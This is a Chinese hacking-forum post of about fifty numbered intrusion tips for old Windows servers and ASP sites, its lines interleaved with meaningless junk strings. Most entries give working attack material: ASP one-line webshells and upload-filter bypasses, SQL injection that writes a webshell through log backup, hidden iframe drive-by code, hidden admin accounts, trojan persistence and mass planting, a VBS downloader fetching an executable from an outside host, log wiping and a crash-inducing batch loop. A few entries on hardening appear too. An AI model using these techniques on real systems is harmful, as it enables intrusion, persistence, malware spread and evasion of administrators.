中国网络渗透测试联盟
标题:
入侵渗透笔记
[打印本页]
作者:
admin
时间:
2012-9-15 14:13
标题:
入侵渗透笔记
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
9 m) ^+ j1 }' s. |- n
cacls C:\windows\system32 /G hqw20:R
) y% z7 @4 h4 P: D
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
0 u; v: F( y: X5 g& F0 I8 s
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
; H: Q! X) s* F5 B2 _
. X1 T& e# M" L" G* u; p
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
m4 Z/ b5 l* a
3 b, g1 ]: \2 U p; \, A& _3 h5 |
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
5 a$ o0 I' `7 Z G$ n
4 ]8 j: G, F9 P- }& c) F
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
- o- c$ M- q, v5 G
2 K" n, s2 `- p0 ^: { w1 J! o% F7 x2 t
5、利用INF文件来修改注册表
u2 X. S% H9 j/ y" Q/ \2 ]1 _
[Version]
2 F9 {; N: V+ k
Signature="$CHICAGO$"
+ n0 k) ?" V) r1 p# Q' W) k% f
[Defaultinstall]
V2 Z; c% F( a0 g2 j3 h5 |
addREG=Ating
6 e3 U: q9 E' m
[Ating]
7 v. i( y* l; h6 _, C
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
* t3 A- N7 E. Z/ J! _9 o- a8 c7 r
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
: Q) o; e) ^4 X8 L
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
( S0 a; r* @4 f5 s }3 G
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
9 s* S+ S; \. h0 J2 z
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
: I: A. x( |0 `+ a- [; x1 e
HKEY_CURRENT_CONFIG 简写为 HKCC
- J2 V" F. I/ Y4 c
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
& W, j! K" b# ?, z4 w
"1"这里代表是写入或删除注册表键值中的具体数据
% V1 `& A* L. R; @' A
8 k' R* o- k0 S( g; T8 ?8 \$ K
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
9 @7 ~2 _7 }" Z; w% [9 ~# l3 P
多了一步就是在防火墙里添加个端口,然后导出其键值
- \) B3 Q5 n7 n
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
7 }# W6 |1 I! B$ B& C
/ W- m. b4 X% e% n
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
% }2 `# a& L+ l, e9 Q2 _2 {
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
( v' L7 s, n- l# E+ v l' ~
- q3 R9 V' a3 w
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
: i4 ?' E8 ` a: a, x
$ M+ W4 J: f& u
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
z, ^7 V4 V9 I
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
( o0 U6 X; ~. b! }2 H: {3 I1 ?
7 v! P: N' \; f4 j1 }% W/ R9 p
10、用google帮我们找网站后台,搜索”filetype:asp site:
www.hack6.com
inurl:login”
0 r# D% `, R2 ]4 p( r# ~$ b' [) [
% k# Z% G' z9 r, e$ W0 U
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
- j+ m2 \( k; J8 O
用法:xsniff –pass –hide –log pass.txt
5 I! Q2 ? k+ j
5 \/ M, `& D/ d/ D& o
12、google搜索的艺术
, ~1 F2 T* [6 w# i
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
3 ~- R% Z6 I1 N5 ^# C) D
或“字符串的语法错误”可以找到很多sql注入漏洞。
5 a F; i# a$ I5 g% ~8 X0 |/ X3 E
5 M6 \0 h$ B! {
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
1 {3 M: A r/ e$ E5 b" F
. B. ?4 E: n' J4 Z1 a+ q5 b
14、cmd中输入 nc –vv –l –p 1987
8 U+ Q/ ]8 Z. O' i
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
6 ]; E5 t! x/ s, E, k4 ?: V( N n9 a
% v( Q& G, l4 S% a0 Z
15、制作T++木马,先写个ating.hta文件,内容为
9 D8 o7 l3 j& e8 D' |% _( t. E: S4 p
<script language="VBScript">
# E2 d9 Q1 l- ~" Q: g. L' K
set wshshell=createobject ("wscript.shell" )
5 {7 e3 A! C1 k6 @3 z
a=wshshell.run("你马的名称",1)
. P/ p5 D" C |# \. Z* f, q7 W
window.close
) j5 j; n1 r0 D6 Y7 @+ L& A6 e$ Q
</script>
' z( k& A; Y- a- Q
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
9 g: @5 _/ t# p
# D. k6 \( g: P" ?7 |; ~' A
16、搜索栏里输入
: a& W: V' u) B; Z6 U' C! L
关键字%'and 1=1 and '%'='
& l6 k; {- G: M* R- t5 \* D
关键字%'and 1=2 and '%'='
( M: V1 g' U' C! P
比较不同处 可以作为注入的特征字符
" A) H: T# w8 e0 @
8 ?" m, ^1 p& Q
17、挂马代码<html>
5 r" N2 e: H- {: ^# k8 s
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
0 d" Q: R1 K/ C f
</html>
5 c& x: t% u2 t; a" F* W
3 L6 N3 u1 V# f0 I
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
s/ R3 f! `0 q' n+ ~* l" w0 s7 ~
net localgroup administrators还是可以看出Guest是管理员来。
: i( e; o+ I5 @# {
8 r: Y/ K+ T) z# _
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
: b e2 g5 g, ^) j7 R7 z
用法: 安装: instsrv.exe 服务名称 路径
" ~4 z% A E( x2 T6 b0 W, c! D" I
卸载: instsrv.exe 服务名称 REMOVE
. R2 ?2 L9 X. v# v" V* [) z& s/ l
6 R5 v2 R" k! G1 V) e7 K
# M$ z( }! L, h8 }8 A. R
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
0 ~7 @4 X$ }5 D
不能注入时要第一时间想到%5c暴库。
# z9 y6 \( s& _' r9 W1 k0 O7 ~, A
6 A+ A- d) i9 U; t
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
1 B) {; P' C& c$ @) _
. v' O+ C- C' T
23、缺少xp_cmdshell时
* ^$ |" y/ a# B9 F# l
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
3 s- F3 g" Z! {0 q+ A- u
假如恢复不成功,可以尝试直接加用户(针对开3389的)
0 `# c7 O* |; l
declare @o int
- _* [7 ^( Z5 p Q0 x% z- I
exec sp_oacreate 'wscript.shell',@o out
+ b# U5 ]4 {! B
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
; N7 f+ c% W6 D8 {7 C+ I! t, x
5 ?2 u# u- h& Q* A
24.批量种植木马.bat
1 m% ^! D4 x" s1 B8 G( g
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
- ]- v9 _" T5 A( Z2 v* H2 f
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
' X2 t+ ]* ~. P+ ]9 o- X* E$ A
扫描地址.txt里每个主机名一行 用\\开头
# C1 B7 X5 N6 y: g3 P. }
9 H5 I$ s) V3 u) q
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
! s0 I" N) Y. A o" T* }2 I) D
# P8 _' j* e9 Y5 g9 r. |
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
u- E: U; S* f) W% S
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
; `$ k6 p) f8 a- m" H
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
& _: c* `* p( V( ^* P( y- g
& J& {9 O/ W( `7 b7 ?' I* y3 Q
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
J2 } p9 w( Z9 x% a, q
然后用#clear logg和#clear line vty *删除日志
' K0 { X' V( {0 X; U p* I
$ L. ], Z+ ~4 q) d% l6 L! p0 ^
28、电脑坏了省去重新安装系统的方法
1 I% R0 F# x+ V; F
纯dos下执行,
: Q- U/ r4 J$ M9 P
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
& F8 k& |& A, [& z* u# i
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
2 x Q% }% G* C% Y; G9 g! ~
% K1 G5 k" z- h( z1 K2 E/ M
29、解决TCP/IP筛选 在注册表里有三处,分别是:
, ]9 a& W, U: e( _% T, K8 c
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
5 `2 w0 D7 i' y
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ A+ w( s9 {' c8 F& M
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
5 w, D% u' C4 @1 h1 g( d3 p* l
分别用
/ k, O- I: V; C% H# q# q
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
7 [6 H+ H/ C& `$ C) S
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
( w4 B6 }$ S o* r8 r' S
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 G( w6 E( O6 \8 A$ m/ l& n5 {
命令来导出注册表项
- d" _$ f6 P6 \5 J! j7 [
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
+ c3 y) C; k5 y8 f( i6 i. M( F
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
/ K- X) Y) v4 W% C/ j6 \
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
( P+ u4 a1 c# I5 P' U$ V/ T
' [$ U1 U4 O5 T
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
( E6 q! [ l/ t7 G9 W; Q
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
7 i) Y! ` U" l+ W2 I1 K) z
( h- i& @0 D" e \, B
31、全手工打造开3389工具
F9 W1 f( S t" L
打开记事本,编辑内容如下:
" f. T: c% Q# Q
echo [Components] > c:\sql
j _+ B; n5 }# ?' k6 r# s
echo TSEnable = on >> c:\sql
( Q$ e( y1 y) ~7 L* v7 @
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
3 r; o+ U% Y: p- n6 Z
编辑好后存为BAT文件,上传至肉鸡,执行
& y6 P# n7 e4 u! U3 T) X
' Z! L) j& I3 S6 B! K
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
v/ g+ `5 |8 _
6 F8 E& d4 }, f, H% c
33、让服务器重启
1 @3 K9 i( r) E" I8 X& W
写个bat死循环:
, \( V" d8 A e+ W/ g, J! h+ w
@echo off
" n4 D6 M l) ]
:loop1
$ a; V* A9 T" W. t @1 Y w
cls
4 N+ C9 L! y: G$ V6 V
start cmd.exe
9 D# H1 h+ |$ q1 d( p: x9 m. p
goto loop1
* |' M2 {# v1 ?8 t
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
# q& {4 C) Z( m! K5 o
: z8 K [" S" [! n
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
4 b t- {' T: n6 k, i5 H$ z
@echo off
! Z7 f$ ]4 f* F! `: J7 K
date /t >c:/3389.txt
4 e) t- U `9 @* w$ T6 d
time /t >>c:/3389.txt
: n' f' j0 |! \7 {0 \. [5 a x
attrib +s +h c:/3389.bat
1 ~+ k N( c4 S$ @
attrib +s +h c:/3389.txt
2 o- i! D! g4 i6 z: V6 I6 A
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
: N9 E+ V( G- k" `0 Q* h* |# H, i
并保存为3389.bat
3 _# O! o5 |7 M, U
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
) q: R! b+ ~2 O8 u
3 e0 a9 }5 u9 [: k( t" k$ f7 _
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
2 r7 x9 V' j6 V/ E {' E3 B
start
http://www.hack520.org/muma.htm
然后点执行。(muma.htm是你上传好的漏洞网页)
% _8 y9 C# R( Y
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
% c1 e: r: s/ A4 u) M- f
7 M6 m# O6 r8 K3 S5 A# D
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
1 M5 A/ @- H; \5 W4 _0 M- X
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
9 H, z9 `8 q6 e0 p: {5 p$ L R; X
echo 你的FTP账号 >>c:\1.bat //输入账号
1 w9 r/ B9 o% \$ n$ m4 m, u5 Q
echo 你的FTP密码 >>c:\1.bat //输入密码
1 C. S( \' x, z+ {9 M( d4 f B8 L
echo bin >>c:\1.bat //登入
6 j8 Q1 S, G. z& n3 B! h
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
$ I" A9 j* Z, Y; R; [
echo bye >>c:\1.bat //退出
/ ?$ y8 H: m$ {+ r) C/ R6 A
然后执行ftp -s:c:\1.bat即可
7 h9 \; E4 ]: v* F9 V* s
# `0 W; E1 R2 B' j' d, W- @
37、修改注册表开3389两法
6 Y( Z% ]9 t, Z: x ]
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
( F0 i2 Y: C9 D8 N; p+ w
echo Windows Registry Editor Version 5.00 >>3389.reg
" ~) _% z. `" z8 X" ~5 f; `
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
9 |0 h% v6 O- R0 u( K. e$ s1 d
echo "Enabled"="0" >>3389.reg
8 p3 w% U$ c% K0 y5 ?
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
& r5 L+ z, E- o+ I
NT\CurrentVersion\Winlogon] >>3389.reg
5 S3 f- Y% z* O4 Y% A
echo "ShutdownWithoutLogon"="0" >>3389.reg
# p' p! f0 a4 D/ p8 G- s
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
, }9 U; z3 O2 f( A j8 E2 d
>>3389.reg
9 N2 N+ i( i3 a3 r
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
+ c0 H7 [$ q* u2 J8 g/ J$ O$ d! w
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
: C$ G: h1 f4 b0 x* ~
>>3389.reg
$ G5 C* J# M" c3 q' k* u3 k
echo "TSEnabled"=dword:00000001 >>3389.reg
$ }& Q1 d }; e+ S- t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
J- E, L* y: X! m
echo "Start"=dword:00000002 >>3389.reg
; T+ A# y; L; H. W4 o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
}- ?/ n8 a* D# t
>>3389.reg
7 Z" a, o5 B5 B1 n4 b
echo "Start"=dword:00000002 >>3389.reg
3 a3 C' W& k! a- x1 i6 i+ }
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
6 U) V- Y8 z O8 ?4 i; d/ Y' r
echo "Hotkey"="1" >>3389.reg
3 d7 x- Y% v+ P& B7 t3 c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 k, r+ B8 ^1 b$ G
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
5 X7 p( p+ U; P' c* G$ [% A
echo "PortNumber"=dword:00000D3D >>3389.reg
% k* U: I1 j. p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( B& ?8 n7 j: q4 @( W: b
Server\WinStations\RDP-Tcp] >>3389.reg
% K4 z7 w& Q) v
echo "PortNumber"=dword:00000D3D >>3389.reg
{; B8 H! v5 M& i9 l/ M; L
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
/ ^5 Y$ H4 k6 U9 d1 u+ j$ G
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
- Y, W2 P3 C$ \- r
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
( m+ K- L' ?0 L8 F3 N
(2)winxp和win2003终端开启
4 C! q* h0 D" l9 t. F8 ]
用以下ECHO代码写一个REG文件:
Z5 ]; x2 P& d+ ]' y4 B
echo Windows Registry Editor Version 5.00>>3389.reg
7 m# A- p, Y; s1 E. e$ v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# i, r- I) |1 \( o; ?
Server]>>3389.reg
9 E* _7 V9 S& X& F
echo "fDenyTSConnections"=dword:00000000>>3389.reg
/ {6 x( S% @) p, h! b: s, ?8 T8 b* `1 \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* I7 q$ _0 U( a. h- e
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
$ ?/ d2 Y4 L& c: G1 c- R8 J6 m
echo "PortNumber"=dword:00000d3d>>3389.reg
5 p1 C2 ~* z" o1 Z+ |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- V- P6 V3 { m# e/ h W+ l
Server\WinStations\RDP-Tcp]>>3389.reg
+ ^" ~3 U. }3 V: Y2 B& C
echo "PortNumber"=dword:00000d3d>>3389.reg
. F- q$ j/ O1 O( y+ O. S
然后regedit /s 3389.reg del 3389.reg
$ v3 o2 N c8 F) S6 w d
XP下不论开终端还是改终端端口都不需重启
+ v% e" X+ T6 l, Q. y2 w
: c: ]8 G/ I2 O+ R* ^8 y. K4 r
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
& `2 `' m* U& c. [5 c3 ~
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
9 L; u. d+ d; R2 C' t
$ j: |9 J1 f, c l7 P5 j h8 X% R
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
2 X" H- e$ X3 S* y
(1)数据库文件名应复杂并要有特殊字符
6 a8 W9 w" f3 l$ M( i
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
* g% c$ S8 |/ Q6 c7 l0 r* t f
将conn.asp文档中的
; c$ z5 Q6 r* F. P. m
DBPath = Server.MapPath("数据库.mdb")
, z7 c: X+ i/ z3 B5 q; s
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
0 t; m( w0 a0 U+ J
5 Y9 {! w% A1 G1 H2 Y0 e# W
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
4 D; s: C+ h6 s' l& F! _
(3)不放在WEB目录里
2 A/ e, r; n0 ~6 [ G6 e
5 F. O% k0 E& O3 w$ e, F% S
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
. `' ^% ]2 }; }- J: x
可以写两个bat文件
c+ c3 e+ m8 I, [) F
@echo off
2 F4 h4 j) r( B; `) _$ [
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
! z R2 A, \8 G' A7 G) d
@del c:\winnt\system32\query.exe
( p' l; L& ]( P
@del %SYSTEMROOT%\system32\dllcache\query.exe
8 ~4 A4 I8 x* c
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
8 ~' ?+ L3 K" e* V2 c4 R
5 c( B* p% D: h! D s
@echo off
/ R/ f1 z- ]/ d) y# x- C: F& z
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
9 t3 `% t* m- W% v3 k# z
@del c:\winnt\system32\tsadmin.exe
2 U0 _/ Y' l& H9 t: W7 z
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
! q6 B- L: U' y
/ b9 X* A" N/ ^# L
41、映射对方盘符
* u; T' f) S/ T4 d; d% F: j
telnet到他的机器上,
$ W& w5 k1 X. E) H
net share 查看有没有默认共享 如果没有,那么就接着运行
% g. I: d2 l4 ^; _
net share c$=c:
; Y' g$ y7 J. _
net share现在有c$
2 e$ X a) f5 J* h: _% V& N
在自己的机器上运行
[# D+ |( B2 _" A- g5 _
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
# o6 N- ~6 ]4 E9 r1 O) z% F
6 v a$ j) p V8 l
42、一些很有用的老知识
+ z% |: ^9 p; o- r, C0 h5 W5 W
type c:\boot.ini ( 查看系统版本 )
3 J& L) s" l" n2 {$ a" ~2 Q
net start (查看已经启动的服务)
# C& w! |; f5 J$ y. m2 e
query user ( 查看当前终端连接 )
& O0 @% C6 u: }. ^4 C/ M
net user ( 查看当前用户 )
- N1 s# h9 i$ l/ ?
net user 用户 密码/add ( 建立账号 )
! B! E g7 F: Y( m" S) c6 p
net localgroup administrators 用户 /add (提升某用户为管理员)
# G: S' V% J0 i- D. U/ ^1 w7 c
ipconfig -all ( 查看IP什么的 )
3 o- T- V) q* z0 [ N+ a
netstat -an ( 查看当前网络状态 )
1 d/ \/ P8 D0 l- ~; P7 T. s
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
/ M8 n3 C' j# E6 a
克隆时Administrator对应1F4
" Y' H1 a! K8 W) x
guest对应1F5
$ f, Q* k7 h* P3 @& y
tsinternetuser对应3E8
7 c) _1 l+ G* c& g
7 X4 h0 u$ s5 \/ Q( U2 Z
43、如果对方没开3389,但是装了Remote Administrator Service
% v9 v' ?6 k7 g" i: B
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
5 m7 I4 n& z8 s" L; E2 E
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
3 A7 j& K: M; }" h9 W+ t
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
0 R! z* O# t+ f5 _* h
# P; T U, `5 s( E( O$ i
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
( }$ W0 \. V% D2 z5 O2 O
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
$ f! j& N4 x) U
0 N# S3 Z# e& e d8 s/ C3 U
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
! @* q% H5 v i4 j
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
& b% q) l( e+ @
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
$ H" o' o' L/ D
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
0 R0 s9 b( n+ d4 R
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
+ R# h" q; L& h
(这是完整的一句话,其中没有换行符)
: v5 @3 C: n1 W' b9 ^5 Z
然后下载:
( I4 `6 N$ l8 @# p+ w
cscript down.vbs
http://www.hack520.org/hack.exe
hack.exe
7 f$ d* G/ X+ @0 e* t+ M
+ O( w ~6 v: w
46、一句话木马成功依赖于两个条件:
/ r8 X5 L& M+ |
1、服务端没有禁止adodb.Stream或FSO组件
$ A4 P" i1 a" {
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
6 D0 Q ?' F9 B/ {8 k2 r0 @
E9 f& u) X- X8 u2 Q; f
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
' y+ q/ V" Y# F4 r' c
;alter database utsz set RECOVERY FULL--
7 l- D" E( H2 u4 c) k3 n
;create table cmd (a image)--
/ @5 H6 s+ F/ Q0 W, N( i) k
;backup log utsz to disk = 'D:\cmd' with init--
: X: i' N9 K' N; h+ F
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
7 D. s8 E/ W- M/ `/ {0 p* C
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
' b4 v0 p. |. u6 {
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
$ C W e6 {6 e5 c9 Y4 I7 O6 t
* g6 n" E0 }7 u4 T$ @# F L# `
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
" d# {, r$ L9 h3 T9 z
! U @! T/ n8 n5 b. k7 q' Y5 y
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
2 S) w i6 ?5 F( X3 I" U
所有会话用 'all'。
( s2 u; Y% B; L# i4 w. V
-s sessionid 列出会话的信息。
# U, e5 N v3 X6 [' A, L
-k sessionid 终止会话。
! @4 }1 S ^& a. f3 ~
-m sessionid 发送消息到会话。
& U. x7 y) Y! \/ g; S# H
% w' y0 y- v8 X4 }, y
config 配置 telnet 服务器参数。
2 F x2 z) N5 B- V- @' _: c# g
) ^. a4 q. v+ e" x
common_options 为:
/ D6 @# L n1 Z3 E+ \5 E, W
-u user 指定要使用其凭据的用户
5 a+ A2 ^- b, U, p9 b- ]
-p password 用户密码
6 h$ w# ^- G6 x: k0 [
/ N9 @ B6 y# w& I9 \: x
config_options 为:
# C4 d3 O8 D6 j* s- t/ F
dom = domain 设定用户的默认域
& x3 a8 `6 X% e/ r
ctrlakeymap = yes|no 设定 ALT 键的映射
: a, _" R; @- l8 n7 M
timeout = hh:mm:ss 设定空闲会话超时值
) z2 Z( r1 j/ Z6 e0 E
timeoutactive = yes|no 启用空闲会话。
, Y4 y6 d! ]: C& A# I
maxfail = attempts 设定断开前失败的登录企图数。
; R6 z; \4 }6 W* U' q/ {
maxconn = connections 设定最大连接数。
1 R n/ p* S2 ^, J
port = number 设定 telnet 端口。
- }' m6 N7 E. _: F0 Z
sec = [+/-]NTLM [+/-]passwd
. I$ @% i/ d! ]9 T) Q- m
设定身份验证机构
" i$ \4 \' s: [5 q3 x
fname = file 指定审计文件名。
6 H) ?! \1 T2 v6 V* X* W
fsize = size 指定审计文件的最大尺寸(MB)。
) Q% Z, m9 V, G8 n
mode = console|stream 指定操作模式。
2 l D( m2 `8 z4 W0 \9 i
auditlocation = eventlog|file|both
1 P( \6 k& Q6 c/ I& Q# Y
指定记录地点
6 z& z3 N8 D6 a# F
audit = [+/-]user [+/-]fail [+/-]admin
2 N0 H2 K/ L. Z4 a
# M; R) P$ R' N! c+ |
49、例如:在IE上访问:
1 m3 _% f& U# N: a
www.hack520.org/hack.txt
就会跳转到
http://www.hack520.org/
/ `( y& v4 w/ `
hack.txt里面的代码是:
7 {/ \3 {! ~, g3 E7 m1 }! B
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
( W% i1 I' N' k; G
把这个hack.txt发到你空间就可以了!
- n. ]/ p: v( h8 F
这个可以利用来做网马哦!
, G- ^8 u: f5 y6 }: D) H
+ Y/ I; z7 O5 l% z `) k- o
50、autorun的病毒可以通过手动限制!
- U* z- I8 n( A8 C
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
" s- U) ?4 @0 E0 ~
2,打开盘符用右键打开!切忌双击盘符~
0 p8 U& g$ M9 u2 p& ]
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
* ?* i7 s N0 U2 x
# `* L6 \ _' D" ~! ~$ n
51、log备份时的一句话木马:
5 B, I- a8 ]/ s% j2 n* z) [# w
a).<%%25Execute(request("go"))%%25>
# Y( ]5 k& c6 V( }
b).<%Execute(request("go"))%>
0 a+ o% m, t7 u& [! T7 b
c).%><%execute request("go")%><%
$ V- u K* D" R7 y" d, {7 m
d).<script language=VBScript runat=server>execute request("sb")</Script>
